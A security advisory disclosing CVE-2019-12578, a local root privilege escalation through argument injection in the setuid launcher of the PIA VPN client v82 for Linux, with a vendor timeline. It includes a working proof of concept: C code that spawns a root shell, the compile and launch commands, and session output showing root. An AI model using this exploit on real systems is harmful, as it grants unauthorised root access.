Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Title: PIA Linux Privilege Escalation: Argument Injection
Author: Rich Mirch
CVE: CVE-2019-12578
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for Linux could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA Linux binary openvpn_launcher.64 is setuid root. This binary executes
/opt/pia/openvpn-64/openvpn passing the parameters provided from the command
line. Care was taken to programmatically blacklist potentially dangerous openvpn
parameters, however the --route-pre-down parameter is not. This parameter accepts
an arbitrary path to a script/program to be executed when OpenVPN exits. The
--script-security parameter also needs to be passed to allow for this action to
be taken. --script-security is not currently in the blacklist. A local unprivileged
user can pass a malicious script/binary to the --route-pre-down option and will be
executed when openvpn is stopped.
Information on the --route-pre-down parameter from openvpn --help
--route-pre-down cmd : Run command cmd before routes are removed.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-43-generic
PIA Version: v82
Note: macOS appears to follow the same pattern and could be vulnerable to the
same issue but I have not verified it.
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - Create woot.c to spawn a shell when executed.
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argvc, char **arv){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
Step 2 - Compile the malicious binary
gcc -fPIC -o woot -Wall -c woot.c
Step 3 - Execute openvpn_launcher.64 with the --route-pre-down parameter with
the path to the woot program. In 5 seconds a root shell will be spawned.
Note: Using the timeout program is optional. The command can be executed without
this but you will need to enter the control-c sequence to kill the openvpn process.
/usr/bin/timeout --signal=SIGINT 5s /opt/pia/openvpn_launcher.64 \
--route-pre-down $PWD/woot --dev tun0 --script-security 2
Step 4 - At this point the OpenVPN process will be running. Enter the control-c
if the timeout program was not used.
Example
user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ cat woot.c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argvc, char **arv){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
user1@woot:~$ gcc -Wall -o woot woot.c
user1@woot:~$ /usr/bin/timeout --signal=SIGINT 5s /opt/pia/openvpn_launcher.64 \
--route-pre-down $PWD/woot --dev tun0 --script-security 2
Wed Dec 26 16:54:56 2018 disabling NCP mode (--ncp-disable) because not in P2MP client or server mode
Wed Dec 26 16:54:56 2018 OpenVPN 2.4.6 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [MH/PKTINFO] [AEAD] built on Jul 26 2018
Wed Dec 26 16:54:56 2018 library versions: OpenSSL 1.1.0h 27 Mar 2018, LZO 2.06
Wed Dec 26 16:54:56 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Wed Dec 26 16:54:56 2018 ******* WARNING *******: All encryption and authentication features disabled -- All data will be tunnelled as clear text and will not be protected against man-in-the-middle changes. PLEASE DO RECONSIDER THIS CONFIGURATION!
Wed Dec 26 16:54:57 2018 TUN/TAP device tun0 opened
Wed Dec 26 16:54:57 2018 Could not determine IPv4/IPv6 protocol. Using AF_INET
Wed Dec 26 16:54:57 2018 UDPv4 link local (bound): [AF_INET][undef]:1194
Wed Dec 26 16:54:57 2018 UDPv4 link remote: [AF_UNSPEC]
Wed Dec 26 16:55:01 2018 event_wait : Interrupted system call (code=4)
Wed Dec 26 16:55:01 2018 /home/user1/woot tun0 1500 1500 init
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#
Timeline:
2018-12-26: Reported to vendor
2018-12-26: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure